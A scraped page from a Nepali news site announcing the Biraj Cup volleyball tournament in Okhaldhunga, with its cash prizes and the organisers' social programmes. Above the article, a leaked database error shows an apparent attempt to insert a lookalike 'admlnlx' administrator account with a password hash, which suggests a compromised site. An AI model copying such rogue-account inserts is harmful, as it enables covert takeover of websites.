WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B5UudTTDyGb.Ua8YQC3F6ZaHYp2FwQ0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 14:17:19', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
विराज कप पुस ११ गतेदेखि – Gaule Khabar

विराज कप पुस ११ गतेदेखि

विराज कप पुस ११ गतेदेखि

काठमाडौँ, पुस ४-

खेल पर्यटनको विकास गर्ने उद्देश्यका साथ ओखलढुंगाको जन्तरखानी गाविसमा पुस ११ गतेदेखि भलिबल प्रतियोगिता आयोजना हुने भएको छ। ३ दिनसम्म सञ्चालन हुने प्रतियोगिताको उपाधि विजेताले विराज कप ट्रफीसँगै २५ हजार नगद पुरस्कार जित्ने जानकारी सह-आयोजक विराट समाजका हरिप्रसाद दाहालले दिए। प्रतियोगिताको उपविजेताले १५ हजार तथा तेस्रो हुने टिमले १० हजार नगद पुरस्कार जित्‍ने उनले बताए।

विराट समाज,काठमाडौं र जलदेवी समाजसेवी युवा क्लब, जन्तरखानीले संयुक्त रुपमा प्रतियोगिता आयोजना गर्न लागेका हुन्। भलिबल आयोजनासँगै पुस ११ गतेदेखि विराज समाजले नागरिक सम्मान, विराज छात्रवृत्ति प्रदान, न्यायो कपडा वितरण लगायतका कार्यक्रम गर्नेछ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका